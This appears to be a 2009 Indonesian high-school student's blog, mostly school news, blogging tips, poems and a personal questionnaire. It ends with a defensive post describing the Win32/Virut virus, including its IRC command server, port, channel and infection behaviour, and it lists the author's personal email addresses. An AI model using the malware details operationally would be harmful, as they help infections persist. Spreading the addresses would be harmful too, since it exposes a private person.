Untuk mengakhiri kebersamaan mereka (jika lulus) di kelas XII.I.A.1. Sebanyak 29 siswa , putra dan putri didampingi oleh 3 orang guru melakukan tour ziarah keluar kota Palangka Raya.Berangkat pada hari sabtu sekitar jam 1.30 dengan dilepas kepala MAN Model. Kepala sekolah berpesan agar seluruh anggota rombongan dapat menjaga nama baik sekolah sekaligus keselamatan selama perjalanan. Rombongan yang berangkat dengan bis STAIN Palangka Raya lengkap dengan supir sekaligus penunjuk jalan yang trampil membuat perjalanan terasa menyenangkan.Rombongan melepaskan lelah dan sholat Magrib di Sabilal Muhtadin dan kemudian window shopping di Duta Mall, walaupun tidak sempat berbelanja karena waktu tutup Duta telah tiba,tapi kunjungan ke Duta cukup menyenangkan.Rombongan bermalam di Asrama Haji, Banjar Baru.
Pagi sekali rombongan meneruskan perjalanan ke Plampayan. Di sana mereka melakukan ritual seperti umumnya dilakukan para peziarah.Kemuadian istirahat sholat di Masjid Martapura sambil melihat-lihat pasar Martapura yang luas. Perjalanan dilanjutkan menuju sekumpul dan rombongan juga melakukan ritual seperti perziarah lainnya.
Perjalanan kemudian dilanjutkan menuju tempat wisata pantai Tangkisung di pelaihari. Rombongan berkesempatan menikmati Sunset, suasana pantai di malam hari dengan hembusan angin laut serta matahari terbit dari vila di atas bukit. Bermalam di atas bukit merupakan pengalaman tersendiri bagi seluruh anggota rombongan. Kemudian perjalanan dilanjutkan ke air terjun Bajuin. Semua anggota rombongan ikut naik ke gunung untuk menikmati air terjun. Tentu saja kesempatan ini digunakan untuk berfoto ria oleh segenap anggota rombongan.
Banyak pengalaman yang didapat seluruh anggota rombongan dan semoga semua ini berguna untuk menuju pengembangan potensi diri yang lebih baik.Semoga.Halimah


Ha..., ha....
Ngutip dari situs MAN Model.
Makasih ya mam Halimah.

Penerimaan Siswa Baru MAN Model Tahun 2009

























Ayo buruan daftar di MAN Model bagi adek-adek yang berada di Palangka Raya, Kalimantan Tengah, yang masih MTs, SMP, dan yang sederajat deh pokoknya (tentu yang kelas 3 dan dah lulus) yang ingin melanjutkan sekolahnya.
Jangan bingung-bingung deh memilih sekolah apa.
Pilih saja MAN Model!
Di sini asyik lho di sini...! :)
Mungkin gambarnya kekecilan ya?
Untuk memperbesar silakan klik gambar tersebut!
Silakan simpan gambar tersebut jika Anda tertarik!
Boleh kok di sebarkan.... ;)

Atau kalau gambarnya tidak kelihatan silakan baca yang ini:
Membuka Penerimaan Siswa Baru Tahun Pelajaran 2009/2010 melalui jalur khusus.
 Siswa yang akan dijaring sebanyak 50 siswa

Syarat Pendaftaran

 Mengisi formulir pendaftaran.
 Mempunyai rangking nilai rapor dari semester 1 sampai 5 untuk MTs/SMP yang berstatus negeri menduduki 10 besar, sedangkan MTs/SMP swasta menduduki 5 besar.
 Menyerahkan foto copy rapor yang telah dilegalisir sebanyak 2 lembar, dan menunjukkan aslinya.
 Mengikuti tes akademik (bidang studi matematika dasar) pada tanggal 11 Juni 2009
 Daftar Ulang tanggal 13 s/d 20 Juni 2009
 Menyerahkan pas foto hitam-putih terbaru ukuran 3 x 4 = 2 lembar.

Waktu Pendaftaran

Pendaftaran dan pengembalian formulir mulai tanggal 11 Mei s/d 10 Juni 2009 setiap hari kerja mulai pukul 08.00 – 11.00 WIB.

Tempat Pendaftaran

Sekretariat Penerimaan Siswa Baru MAN Model Palangka Raya Jl. Tjilik Riwut Km. 4,5 Palangka Raya.

Visi dan Misi

VISI MAN MODEL PALANGKA RAYA :
Siswa yang religius, terampil, mandiri dan berwawasan ke depan.

MISI MAN MODEL PALANGKA RAYA :
1. Menyelenggarakan pendidikan menengah untuk memasuki perguruan tinggi dan dunia Kerja.
2. keislaman dan mengamalkan dalam kehidupan sehari-hari.
3. Membentuk sumberdaya manusia yang berjiwa wira usaha yang menguasai iptek dilandasi imtaq.

Saturday, 20 June 2009

Launching Tutorial BeKaBe (bagian 2)



















Akhirnya rampung juga saya jadikan PDF + format halaman berbasis buku.
Semoga bermanfaat.
Judul: Menghindari Penyebaran Virus Komputer Dimulai dari Diri Kita Sendiri.
Target: Pemula.
Silakan download dengan meng-klik gambar di atas (via MediaFire).
http://www.mediafire.com/download/oshkh0mrbt6wx42/menghindari_penyebaran_virus_komputer_dimulai_dari_diri_kita_sendiri.pdf

Monday, 15 June 2009

Launching Tutorial BeKaBe (bagian 1)

Alhamdulillah akhirnya, jadi juga Tutorial yang selama ini saya tulis siang dan malam.
Maaf untuk sekarang masih promosi cover saja.
Insya Allah kalau sudah rampung 100% akan saya posting lagi.

Tuesday, 9 June 2009

Memajang Foto di Internet + Menjadi Blogger




Assalamu’alaikum Wr,Wb.

Memang sih dulu (sebelum jadi blogger) saya pernah bertanya-tanya dalam hati, “Bagaimana sih agar foto kita ada di internet?”

Ternyata seiring berjalannya waktu, pertanyaan itu pun terjawab sudah. Senangnya hati ku. J

Saat bersekolah di sekolah MAN Model Palangka Raya, banyak hal yang saya dapatkan, mulai dari rakyat jelata, eh siswa biasa maksudnya hingga menjadi pemburu ‘virus flashdisk’ (virus komputer). Mengapa hal demikian bisa terjadi? Hal itu karena di MAN Model terdapat fasilitas internet (malahan bukan cuma LAN, HotSpot juga ada lho. terima kasih pak pengelola jaringan) yang berguna sekali bagi kita (sebagai keluarga besar MAN Model) yang memerlukan informasi di internet, dan sebagainya deh. (MAN Model, I Love You).

Oke, sudah cukup basa-basinya. Sekarang kita menuju topik. Agar foto kita ada di internet, salah satu yang bisa kita lakukan adalah kita bisa jadi seorang blogger. Kenapa salah satunya? Karena banyak fasilitas yang menyediakan hal serupa di internet. (terima kasih kepada pendiri internet).

Saya memilih Blogger (situs di: http://blogger.com) karena selain kita bisa memajang foto, kita juga bisa saling berbagi ilmu pengetahuan dengan tulisan artikel kita. Ya, itu lah tujuan utama kita menjadi blogger “Berbagi ilmu pengetahuan”. Tidak ada ruginya kok berbagi ilmu, kita bisa mendapat pahala dan malahan ilmu kita bisa bertambah.

Menulis artikel adalah kegiatan rutin para blogger. Berjam-jam dihadapan komputer adalah kegiatan yang biasa. Eits…, tidak mesti menulis sendiri lho, kita juga bisa menyalin artikel punya orang dan tentunya jika itu tulisan dari orang (blog sebelah, alias tetangga) maka demi menghargai karya orang kita harus tidak boleh lupa untuk menuliskan sumber artikel yang kita dapat. Misal di dapat dari situs ini, maka tak lupa tuliskan alamat situs ini dengan menulis “Sumber: http://bekabe.blogspot.com” di bawah postingan artikel. Biasanya para blogger tidak melarang kita untuk meng-CoPas (Copy-Paste) artikelnya kok, dengan syarat menyertakan ‘sumber artikel’, itu saja. Tau tidak apa yang dirasakan oleh seorang blogger jika artikel mereka terpublikasi oleh blogger lain? Tentu mereka senang karena merasa artikelnya mengundang perhatian pembaca, dan mendatangkan manfaat! J (maaf bagi blogger yang tidak sependapat).

Pada saat menulis artikel (tentunya sedang OnLine/terhubung ke internet), di sana terdapat berbagai ‘menu’ yang telah disediakan, termasuk meng-UpLoad (menyalin keluar) foto. Jika foto sudah ter-UpLoad dan artikel telah terpublikasi di internet, maka kita bisa melihat foto yang telah kita posting (menge-pos, tidak berarti pos surat) beserta artikel tadi.

Dari artikel ini, saya selaku pribadi mengharapkan Anda (pembaca yang budiman) yang sebelumnya tidak tertarik untuk berbagi ilmu di dunia maya yang penuh dengan ilmu pengetahuan ini, dapat ikut tertarik menjadi bagian dari kami (Blogger). Apa lagi jika Anda punya koneksi (sambungan) internet sendiri (tidak seperti saya yang menulis di rumah terus nge-pos artikel ke warnet atau ke sekolah dulu agar dapat sambungan ke internet. menyedihkan ya…. tapi tidak mengapa, tetap semangat), atau setiap hari Anda bekerja di kantor yang tersedia jaringan internet gratis, toh dari pada Anda hanya ‘menyedot’ ilmu kami yang tidak ada habisnya ini, lebih baik kita salurkan ilmu pengetahuan kita untuk mereka yang memerlukan. (ya…, meluangkan waktu beberapa jam dari kegiatan kita tak mengapalah).

Tidak mesti harus (lho…, pemborosan kata ya….) menjadi seorang guru besar (professor) untuk menjadi blogger dan berbagi ilmu pengetahuan, karena kita telah diilhami oleh Tuhan Semesta Alam Allah SWT otak untuk berfikir dan belajar. Maka tentu setiap dari kita punya kelebihan tersendiri yang kiranya dapat kita bagikan kepada orang yang memerlukan. (ya…, walau hanya dengan tulisan).

NB: Ilmu pengetahuan tidak akan ada habisnya, selama kita umat manusia masih hidup dan terus berpikir. Saling berbagi dan memberi adalah hal yang ‘membahagiakan’, apa lagi ‘ilmu pengetahuan’.

Wassalamu’alaikum Wr,Wb.

Regard,

Neo BeKaBe

Saturday, 16 May 2009

Firefox Bahasa Indonesia

Sudah pada tau kan yang namanya Mozilla Firefox?
Tentu bagi para netter (pengguna internet) mania maupun netter umum sudah pada tau sama aplikasi browser yang satu ini.
Tapi tau tidak kalau Firefox itu bisa bahasa Indonesia?
Maksudnya pengaturannya menggunakan bahasa Indonesia.
Nah..., ide ini saya dapat dari teman saya. Kebetulan dia baru beli NoteBook dan masih nanya-nanya sama saya. Sambil ngajarin dia, ya..., sambil lihat-lihat isi aplikasinya juga deh sekalian.
Eh..., ketemu Firebox, eh Firefox dengan pengaturan berbahasa Indonesia, terus sebagai imbalan dari pengajaran saya, ya saya minta deh tu aplikasi, toh sesama teman saling harus berbagi.
Tanpa perlu install Firefox baru, cukup dengan MFBI (Mozilla Firefox Bahasa Indonesia) ini Firefox sudah bisa berbahasa Indonesia, eiitsss..., pastikan dulu bahwa Firefoxnya versi 3.0.1. Untuk melihat versi Firefox silakan dicari di Help, terus About Mozilla Firefox.
Cara menggunakannya cukup mudah, tinggal klik "Instal.bat", dan jika mau meng-Un-Install tinggal klik "Un-Install.bat"
Berhubung saya masih Newbie, saya mohon maaf atas segala kekurangannya.

Semoga bermanfaat!
Salam Newbie,
Neo BeKaBe

Wednesday, 6 May 2009

Dapat Award (perdana)

Neo dapet award dari rekan (rekan sesama blogger maksudnya) Soff-Tis dan Mia. Mana dua2nya pake PR pula, huweeeeeeeeeeeeeeee I hate do homework (ga tau mesti jitakin si Mia ma Soff-Tis pake tiang atau bilang makasih neh hehehehe). Thanks buat awardnya guys, dan daku (dengan berat hati) doing my homework (sigh.mode on). (maaf Mia, kalimat Mia saya CoPas).

Award dari: Mia

Fajar Design


1. Nama Sekolah;
MAN Model PAalangka Raya
2. Nama Ketua Kelas;
Kelas 1 si Waldy, kelas 2 si Hasby, kelas 3 si Bayu
3. Jabatan di Kelas;
Hanya sebagai seksi perlengkapan (hik..., hik..., selama 2 tahun berturut)
4. Guru Paling KILLER;
Mmmm..., guru Kimia ibu Nurlina. Suka ngerazia rambut (emang rambut berbahaya yah????)
5. Nama Kepala Sekolah;
Bapak Mulyono
6. Nama Wakil Kepala Sekolah;
Gak tau, heheheh kurang pamor sih
7. Ketua Kelas (apakah saya pernah menjadi ketua kelas???);
Nggak. Soalnya kerjaan ketua kelas itu kayak babu. Bawa2 buku latihan anak-anak ke ruang guru, jadi bulanan anak-anak. Bweeuh..., cape deh...
8. Pelajaran yang Paling Tidak disukai;
Semua, kecuali TIK (belajar komputer). (kenapa gak masuk SMK/STM saja sekalian ya kemarin itu?)
9. Kegiatan Rutin di Kelas;
Nyapu, bersih-bersih kelas, ngisi tinta spidol sama masang LCD Proyector (kan perlengkapan) (perasaan di rumah gak pernah nyapu, paling mami yang nyapu)
10. Skorsing;
Gak pernah. Kan saya anak baik-baik (bayangin aja, saat anak2 yang lain bajunya keluar, eh saya sampai pulang bajunya masih rapi masuk ke dalam)
11. Hukuman!!!;
Hmmm..., waktu itu saya error, saya kira masuk jam 9 kayak beberapa hari sebelumnya, eh pas datang (udah siangan jam 9 gitu deh) saya telat, dipulangkan deh
12. Bikin PR di kelas;
Sering.... Pokoknya sering deh
13. Pengaturan Tempat Duduk;
Kelas satu dan dua duduknya berdua. Waktu kelas tiga duduknya berlima berjejer gitu
14. Nomor Absen;
Nomor 27 kalau gak salah (wah..., angka sial) ]*_^[
15. Jurusan di kelas;
IPA
16. Bolos???;
Jauh-jauh deh.... Tapi waktu MTs pernah juga sih :)
17. RAME;
Rame sekali. Anak-anak suka lebay gitu, kadang gilanya kambuh (mungkin karena jurusan IPA yg terkenal gmana gitu), pokoknya kita kompak deh
18. Adek Kelas yang RESE??;
Ada sih
19. Kakak Kelas yang RESE??;
Kayaknya gak ada
20. Bawa HaPe (mobile phone) ke Sekolah;
Kelas 1 HaPe masih jadul, kelas 2 cukup untuk browsing lah, kelas 3 gak bawa lagi, soalnya pakai NB
21. BERANTEM;
Pernah sih hampir berantem, soalnya NB saya diserang, langsung naik deh emosi saya (kan tempramental tuh, kayaknya), tapi untung anak-anak misahin
22. Pelajaran yang Paling disukai;
TIK, komputer deh pokoknya, ya..., walaupun gak ada dipelajari programming (paling cuma Office 2003), tapi bisa otodidak lah (walaupun dikit)
23. Tempat Favorit di Sekolah;
Kelas ku istana ku. Pokoknya jarang ninggalin kelas deh. Apalagi kelas 3, sambil browsing pakai NB (nebeng hotspot sekolah, mumpung gratis, tapi bayar juga sih komite) ]*_^[
24. KANTIN;
Suka beli minum atau permen
25. Melanggar Peraturan;
Bikin PR disekolah (termasuk gak ya?), kayaknya saya tipe taat peraturan deh (suwer, eh swear), gak ada yang perlu dilanggar

Nah, terus dilanjutin yang PR ke2 nih (ampuuuun DJ, masih ada ternyata >____<) (Mia, maaf saya contek!) 1. Apa ada sehari dalam hidupmu tanpa melihat warna putih???; Nasi putih. Tiap hari tuh buat sarapan. Setiap hari lihat warna putih dong 2. Apa kamu pernah mendapat peringkat 3???; 1, 2, 3, pernah waktu SD 3. Apa petualangan paling mengerikan yang pernah kamu rasakan???; Pergi sekolah hujan-hujan, ngebut, takut telat ceritanya, eh nabrak orang yang nongol di bawah jembatan (pakai motor juga), padahal yang di bawah gak boleh belok, tbruUKk..., meluncur deh saya ke jalan aspal yang hitam sambil terguling-guling, untung gak ada organ yang patah (Alhamdulillah terima kasih ya Allah) (petualangan atau pengalaman sih?) 4. Nama sahabat; Kalau dibikin satu2, bakal panjang neh 5. Alamat E-Mail; ryanhidayat014@yahoo.co.id ryanhidayat014@hotmail.com samosir.ryan@gmail.com bekabeipa@gmail.com 6. Berapa orang contact mu di YM; 0,000000000025 7. SMILEYS paling kamu suka; :), ;), :P, dan ]*_^[ dan award yg ini di tag ke 5 blogger yaitu...: (hohoho gue kasih kalian PR) (ternyata bukan cuma anak sekolah yang dapat PR ya?) 1. ???? 2. ???? 3. ???? 4. ???? 5. ???? saya sangat bersyukur sekali kepada Tuhan karena mendapatkan banyak sekali limpahan kasih dan persahabatan dari teman-teman blogger yang di wujudkan lewat pemberian Award. Award dari Soff-Tis


Banner 1


Aturannya adalah:

1. Buatlah daftar 10 hal dan kebiasaan (buruk) yang tidak disukai, namun apabila merasa terdapat lebih dari 10 hal/kebiasaan buruk yang tidak disukai maka silahkan ditulis semuanya.
2. Sebutkan juga alasan mengapa Anda tidak menyukai hal-hal/kebiasaan-kebiasaan (buruk) tersebut.
3. Setelah selesai membuat daftar dan penjelasan seperti yang tertera pada poin 1 & 2, maka silahkan men-tag 10 blogger lainnya.

10 kebiasaan buruk yang saya benci:

1. Cuek, jutek, dingin, sombong
alasan: tidak bersahabat banget sih, kan manusia itu makhluk sosial yang saling membutuhkan satu sama lain (eits..., tapi kalau diajak ngomong nyambung kok, bahkan kadang2 bisa OverProtectif), cuma tuhan yang boleh sombong
2. Tidur kelamaan
alasan: seperti orang males
3. Moody
alasan : Neo moody-an bgt. Kalau mood-nya rajin, bakal jadi orang rajin sedunia. Kalau mood-nya males, ngapa2in jadi males. Kalau mood lagi berani, I am the brave boy in the world, tapi kalo mood lagi penakut, I am like a cat coward. Dua sisi yang berlainan banget
4. Makan ga teratur
alasan: alau lagi tenggelam atau asyik ngerjain sesuatu, Neo bisa lupa makan deh. Malah terkadang bisa lupa makan seharian (bener loh) tapi Alhamdullillah, ga kena magh hehehehe (dasar orang aneh, masa makan kerjaan bisa kenya). Kadang sih suka puasa Senin-Kamis juga
5. Sok tahu
alasan: malu-maluin, kalo ditanya jadi pusing sendiri Menjadi "broker pengetahuan" lebih baik dari pada sok tahu yg ngelantur
6. Cemberut/murung
alasan: buang-buang waktu. Meski kita cemberut toh matahari masih bersinar, burung masih berkicau, dan pejabat masih juga korupsi..., wkwkwk. Berbagilah senyum dengan orang lain karena senyum itu ibadah, lagi pula senyum kan nggak beli. Tapi jangan kebanyakan tersenyum nanti dikira orang gila
7. Buang-buang waktu
alasan:banyak yg harus kita kerjakan,waktu senggang harus dibuat untuk menghasilkan sesuatu yg bermanfaat, misal ; saya selalu membaca buku di dalam angkot ketika saya berpergian,mengantri di ruang tunggu rumah sakit dsb.
8.Nomong suka cepat
alasan: kalaU yang ini, Neo ga gitu ngerasa. Tapi sangat dirasakan oleh lawan bicara Neo. Katanya sih, Neo kalau ngomong cepet banget. Kayak yg lagi dikejar kucing (hehehehe)
9. Suka sensi
alasan: ini juga yang ga Neo suka. Kalau lagi sensi, susah banget mengatur emosional Neo. I hate this habit. Lagi berusaha untuk memperbaikinya :p
10. Tidak berterima kasih
alasan: hidup adalah berkat jadi ucapkanlah terima-kasih atas apapun yg diterima oleh diri kita, meskipun itu hinaan, "it's painfull but healing too". Karena mengucapkan terima kasih membuat pribadi kita menjadi luhur. Sebaliknya ketika kita tidak mau berterima kasih, kita sudah merendahkan martabat kita sendiri... (halahh..., sedang berkotbah mas?)

Terima kasih,

blogerozt yang mendapatkan giliran mengerjakan Pr ini adalah:

1. ????
2. ????
3. ????
4. ????
5. ????
6. ????
7. ????
8. ????
9. ????
10.????



Kepada teman-teman sekelas, maaf Neo yang sok berkuasa ngadmin ni blog (kan gue head adminnya).
Harap maklum ya! ]*_^''[

Friday, 1 May 2009

Laporan Lomba Grafity






Kan kemarin ada lomba tuh dari sekolah, salah satunya adalah lomba Grafity (itu lho, yang ngegambar di dinding).








Tuh..., macam-macam gambarnya.





Dan ini lah Gambar pemenangnya (yang tidak lain adalah kelas BeKaBe sendiri, juara 1).
Makasih ya teman-teman yang sudah susah-susah menggambar grafity-nya.
Untuk yang belum juara, tetap semangat!!!!
Untuk semua peserta yang ikut lomba, terima kasih atas partisipasinya.

Keep Creative!

Foto-Foto'an






Majang foto dulu ah....

Monday, 27 April 2009

Ribet Mengatur AutoPlay-AutoRun?

Ini solusinya!

Iseng-iseng saya buat untuk para user (pengguna komputer) yang tidak terlalu mengerti tentang Regedit atau apalah yang berhubungan dengan men-setting komputer.

Software ini saya beri nama APE (AutoPlayEdito/Atur AutoPlay). (tuh sekalian link downloadnya)

Software ini saya buat sederhana saja, hanya terdapa 3 fungsi utama (memang fungsinya cuma terdapat 3 command/perinah kale).

1. AutoPlay default atau Not Configurate (warna pink) (ihh..., wrna cwe tuh....)

2. Autoplay Off All Drive (warna hijau)

3. Autoplay Off CD (warna kuning)

Ini berguna untuk menghindari penyebaran virus via (lewat) file "autorun.inf".

Software ini bekerja dengan merubah settingan (pengaturan) pada Regedit (registry editor).

Maaf kalau programnya cupu, culun. Masih BaBy, eh NewBie maksudnya. :)

Sudah dulu ya.

Saya mau pulang dulu nih. (kan ceritanya nebeng di hotspot sekolah (MAN Model)).

Harap laporkan 1 X 24 jam (emang RT  :) ) jika terdapat bug (kesalahan).

Wassalam....

Neo_BeKaBe

Monday, 30 March 2009

MAN, Apa Sich...?

Berhubung sudah dekat UN (Ujian Nasional) nih, maka kami (penulis blog ini) tidak punya banyak waktu untuk menulis. Soalnya, sudah kelas 3, kan sayang kalau tidak lulus, jadi lama deh melanjutkan ke perguruan tingginya.
Oke, mungkin bagi orang Islam, kata Madrasah itu sudah tidak asing lagi di telinga. Tapi bagi non-Islam, mungkin mereka belum tau apa arti dari Madrasah. Tapi, tidak menutup kemungkinan lho ada juga Islam yang tidak tau maksud dari Madrasah.

Madrasah diambil dari bahasa Arab.
Madrasah artinya adalah sekolah.

Baiklah langsung saja kita cari tau kepanjangan MA, MTs, MI.

Madrasah Aliyah adalah kepanjangan dari MA.
Madrasah Tsanawiyah adalah kepanjangan dari MTs.
Madrasah Ibtidaiyah adalah kepanjangan dari MI.

MA setingkat dengan SMA (Sekolah Menenngah Atas).
MTs setingkat dengan SMP (Sekolah Menengah Pertama).
MI setingkat dengan SD (Sekolah Dasar).

Jika ketiga (tiga atau enam yah…?) singkatan ini diakhiri dengan huruf “N”, maka lembaga ini di sebut lembaga Negeri. Contoh: SMAN sama dengan SMA Negeri sama dengan Sekolah Menengah Atas Negeri.

MAN Model Palangkaraya berarti sekolah setingkat dengan SMA. Karena dibelakang terdapat huruf N (MA”N”), maka lembaga ini berbasis negeri.

So, kalau sudah lulus, apa lagi dong tingkatannya?
Kuliah. Inilah yang menuggu di depan mata. Tentunya bagi mereka (kita) yang masih ingin terus menuntut ilmu.



Posted by Riyan Hidayat Samosir
In http://bekabe.blogspot.com

Saturday, 7 March 2009

Program Penerapan Teori

Program apa sih?
Begini, kami (sebagai pelajar) setiap hari selalu bergelut di dunia teori, nulis ini-itu, memahami ini-itu, dan lain sebagainya. Sehingga, ‘teori’ pun menjadi makanan sehari-hari. Memang sih ada praktek seperti olah raga, tinkom, Bio-Praktek, listening, drama, dan lain sebagainya. Namun, alangkah lebih baik jika praktek itu bukan hanya pada pelajaran yang memang seharusnya dipraktekkan.
Membuat tape, dilihat sekilas hanyalah sebagai praktek biasa pada pelajaran Biologi, namun setelah dipikir-pikir ini juga merupakan pembelajaran penerapan.
Mengapa demikian?
Hal ini karena sebelumnya telah diajarkan teori tentang perubahan ubi kayu atau beras ketan menjadi tape karena dicampur ragi. Jika sebelumnya kita telah mempraktekkannya, maka bukanlah hal yang susah jika kita menginginkan tape namun tidak ada yang menjual, kan bisa membuatnya sendiri. Bahkan bisa dijadikan sebagai usaha jika menjualnya.
 Induksi Elektromagnetik, aplikasi induksi elektromaknetik pada pelajaran Fisika membahas tentang prinsip kerja transformator. Alat yang dapat digunakan untuk menaikkan atau menurunkan tegangan listrik arus bolak-balik disebut TransFormator atau sering disingkat (disebut) trafo. Tarfo ini berada tidak jauh dari kehidupan kita. Televisi (TV), lemari es, mesin cuci, kipas angin, dan lain sebagainya bisa menyala karena adanya pengaturan dari trafo.
Apa yang kita lakukan jika trafo rusak?
Tentu kita minta bantuan petugas servis untuk memperbaikinya. Memang tak bisa dipungkiri.
 Apa yang kita lakukan jika tidak ada penjual tape, padahal istri sedang mengidam ingin makan tape, dan sebenarnya kita pernah belajar + mempraktekkan membuat tape saat di sekolah dulu.
 Tinggal buat sendiri saja.
Yap…, benar sekali. Kurang lebih seperti itulah kehidupan kita.
Apa yang dapat kita simpulkan?
 Yang dapat kita simpulkan adalah bahwa kebisaan kita bisa menjadi bekal kita menjalani hidup yang fana ini (aduh…, pakai didramatisir segala ya kalimatnya).
Jika ternyata terdapat program kerja Penerapan Teori, maka mungkin kita bisa bangkit membangun negeri kita ini.
 Mengapa demikian?
 Karena, negeri yang maju adalah negeri yang sistem produksinya tinggi.
Coba seandainya Indonesia bukan hanya menjadi negeri konsumen tetapi produsen, maka apa yang terjadi? Tentu Indonesia akan bisa mendapat income (pemasukan) dari hasil produksinya.
Tengoklah om ‘saya’, Mr. Bill Gates (maunya…:)), orang terkaya di AS. Beliau adalah produsen yang hebat. Bahkan beliau sempat menjadi orang terkaya di dunia (baca-baca dari internet sih gitu katanya). Microsoft adalah perusahaan yang beliau dirikan untuk software (perangkat lunak) komputer (khususnya Windows). Sudah sangat banyak membantu di kehidupan kita (khususnya kehidupan penulis). Microsoft Word contohnya. Merupakan software untuk menulis (mengetik), salah satu produk dari Microsoft Corp.


Mengapa harus program Penerapan Teori?
 Kan tadi sudah nengok om William Henry Gates III alias Bill Gates, sekarang tengoklah para programmer! Kami (para programmer) menerapkan metode Penerapan Teori ini pada program yang dibuat. Untuk membuat program yang berguna seperti yang dibuat om Bill Gates tadi, teori-teori harus terkumpul terlebih dahulu dalam pikiran, lalu kemudian dikembangkanlah menjadi program (software/perangkat lunak) seperti yang diinginkan. Entah membuat virus yang merugikan yang bisa memakan habis file (data) yang berekstensi “.doc”, atau justru membuat anti virus yang bisa sekaligus memperbaiki komputer dari kerusakan registry atau data yang telah diserang oleh virus, ya…., semua itu berasaskan teori yang kami (programmer) miliki.
Begitu juga menulis. Kami (para penulis) menulis dengan tujuan untuk saling berbagi ilmu pengetahuan demi menerdaskan anak bangsa. Kalau anak bangsa bisa cerdas, tentu tak akan mudah untuk dijajah oleh bangsa lain.
Jika anak bangsa bisa cerdas, aktif dan kreatif sehingga bisa menjadi produsen, maka untuk menjadikan Indonesia sebagai Negara Produksi itu bukanlah hal yang tak mungkin!
Yakinlah semua itu bisa terjadi!







NB: Tak ada yang mudah, namun tak ada yang tak bisa

Monday, 2 March 2009

Pelantikan OSIS 2008/2009 MAN Model Palangkaraya





Senin (02-03-2009), pelantikan OSIS (Organisasi Siswa Intra Sekolah) masa bakti 2008/2009.
Diharapkan OSIS tahun ini bisa lebih baik dari tahun-tahun sebelumnya. (eits..., bukan berarti tahun2 kemarin gak baik:)).
Berikanlah yang terbaik untuk sekolah ya teman-teman (adik-adik)!
Sukses selalu ya...!

Thursday, 12 February 2009

Bimbang Ku dalam Masa Ku

aDalam bimbang, aku terhanyut
Aku tak tau, apa yang harus ku pilih
Entah iya, atau kah tidak?
Terhanyut aku, dalam derasnya waktu
Ku tak mau jadi orang lain
Dan aku takkan pernah bisa jadi orang lain
Kata orang, masa paling indah ialah masa di sekolah
Masa di mana para muda-mudi bermain cinta
Namun, ku tak merasakannya
Dan takkan pernah bisa
Aneh kah aku?
Tak pantas kah aku merasakannya?
Huuuh…, aku hanya dapat menghela nafas
Dan nafas ku, aku tak pernah tau sampai kapan?
Entah aku bisa hidup seribu tahun lagi
Atau kah besok aku tak bisa menghelanya lagi?
Aku hanya berserah pada-Nya
Dan aku yakin, Dia lah yang telah mengatur semuanya
Bukan maksud ku menghindari kenyataan
Namun, aku…, aku juga tak tau?
Haruskah aku terus menuggu?
Hingga waktu, yang kan menjemput ku

Saturday, 31 January 2009

Try Out

Hari Senin, 2 Februari, kelas XII (12/3) MAN Model Palangkaraya mengadakan Try Out.
Siswa diharapkan untuk menggunakan pensil 2 B dalam menjawabnya.

Saturday, 24 January 2009

Pemilihan Ketua OSIS

Hari ini (24-1-2009) di MAN Model Palangkaraya mengadakan pemilihan ketua OSIS.
Dan yang terpilih pada tahun ajaran ini ialah Wildani.
Harumkanlah nama MAN Model.
Buatlah program kerja dan visi-misi yang bisa berguna!
Selamat bertugas.

PPI

Akhirnya, ujian sudah dekat, berarti akan meninggalkan bangku MA (Madrasah Aliyah) menuju ke perguruan tinggi.
Hari ini kelas XII (12) dapat pembagian sembako bekal PPI.
Tujuan PPI sendiri ialah agar siswa bisa mengamalkannya di kehidupannya!

Thursday, 22 January 2009

Puisi untuk sahabat

By Inndi Ajha

Ingin kubangunkan kau sebuah gunung
Agar ketika hatimu berkecamuk
Kau dapat menyepi kesana mencari tentram
Ingin kutangkap dan kukotakkan sepuluh kupu
Agar kala sedih tiba
Kau dapat membuka kotak itu untuk memberimu riang.

Ingin kugapai dan kuberi kau seratus pelangi,
Agar di tengah badai mengamuk
Aku dapat bersamamu mengusir sedih
Ingin kupetik dan kuberi kau seribu mawar
Agar kala kemarau dating menyengat
Aku dapat bersamamu menebar senyum

Hatiku ruah dengan semangat membumbung
Untuk menyentuh hatimu
Dan membuatnya girang
Dengan sejuta angan-angan
Aku berikan diriku
Agar kau dapat mengejar mimpi riang

Aku sadar sahabat, diriku terbatas,
Aku sedang belajar
Menggapai pelangi,
Menanam mawar,
Mengejar kupu
Membangun gunung
Tapi, sementara aku belajar
melakukan semua itu,
Mari kau pegang tanganku erat
Sandarkanlah dirimu di bahuku
Karena aku sahabatmu.

Wednesday, 7 January 2009

Virut, Ancaman yang Tak Terlihat

Huh…, sebel…. Setiap periodenya pasti saja selalu ada virus yang semakin tidak karuan saja, sehingga membuat user (pengguna komputer) kalang-kabut kaya kebakaran jenggot, khususnya bagi para user yang tentunya care (perhatian) sama komputernya (yang gak care, gak usah dipikirin, rusak-rusak deh sana komputer lo, toh punya lo juga, gak care pula sama apa yang dimiliki).
W32/VIRUT namanya. Saya bingung harus menyebutnya apa? Dibilang Virus, iya! Dibilang Trojan, boleh juga! Dibilang Compressor, bisa jadi! Huh…, bingung…..
Namun yang saya bahas di sini bukan bingungnya itu, tapi mencoba mengenal apa sih sebenarnya virus W32/Virut itu?
1. Sebagai Virus, ya iya lah! Namanya juga program jahat!
2. Sebagai Trojan, habisnya, dia bisa dikendalikan oleh si pembuat, tentunya lewat jaringan internet. So, selama tidak terkoneksi ke internet sih, tidak apa-apa!
3. Sebagai Compressor, kalau untuk program yang baru jadi dan ingin melindungi programnya dari ReFormer sih, memang tugasnya si Compressor! Tapi ini, yang sudah di Compress kok masih tetap saja melakukan Compress program. Ini nih yang membuat si Virut mempunyai Poly Charact, yakni juga sebagai parasit.

Dikutip dari blog tetangga, jangan lupa untuk mampir juga ke situsnya ya: http://esetiawan.wordpress.com

Berikut profil dari Win32/Virut ini, diterjemahkan dari situs AVG :
Win32/Virut adalah parasit penginfeksi file yang berekstensi .EXE, bertindak seperti IRC bot, berkomunikasi lewat port TCP 65520, lalu membuka channel #virtu di alamat server IRC proxim.ircgalaxy.pl
Langkah pertamanya setelah dijalankan adalah menyuntikkan prosesnya (winlogon.exe), alasannya adalah filrewall tidak akan mengenali virus ini. Kemudian virus akan menginfeksi file di harddisk lokal atau jaringan. Virus ini tidak bergantung pada penggunaan atau eksekusi file-file di harddisk.
File yang terinfeksi mempunyai ukuran file lebih besar sekitar 9kb, dan tidak akan menyimpan timestamp (waktu dibuat, waktu diubah) aslinya. Timestamp akan berubah ke waktu saat virus menginfeksinya.
